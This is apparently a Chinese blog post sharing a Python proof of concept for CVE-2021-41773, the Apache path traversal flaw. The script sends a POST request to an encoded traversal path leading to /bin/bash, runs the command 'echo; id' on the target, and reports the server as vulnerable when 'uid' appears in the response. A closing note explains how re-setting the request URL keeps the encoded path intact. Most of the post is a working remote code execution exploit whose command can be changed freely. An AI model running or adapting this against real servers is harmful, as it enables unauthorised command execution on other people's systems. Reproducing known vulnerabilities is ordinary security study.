Poc_CVE-2021-41773

DVWA的POC基本上结束了，其他的没写的也都是类似的，接下来就写一些已复现过的POC吧~

---

import sys
import time
import requests

def main():
    s = requests.Session()
    try:
        url = 'http://'+input('Please input your id:port,example:127.0.0.1:8080:')+'/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
        command = "echo; id"
        req = requests.Request('POST', url=url, data=command)
        prepare = req.prepare()
        prepare.url = url
        response = s.send(prepare, timeout=5)
        output = response.text
        print(output)

        re = 'uid'
        flag = re in str(output)

        if flag:
            print("It looks likely vulnerable")
        else:
            print("It is strong")


    except:
        print("Bye bye")
        time.sleep(0.5)
        sys.exit(1)

if __name__ == '__main__':
    main()

注：因为post请求默认转发的地址已经经过了url编码，所以第一个写的url其实是解码后的/cgi-bin/../../../../../bin/bash，会被识别出来。所以这里使用的session，并且post包构造好后，在重新定义一下url，即可完成漏洞url的访问~

Github——https://github.com/wave-to/Poc/tree/main/Path_through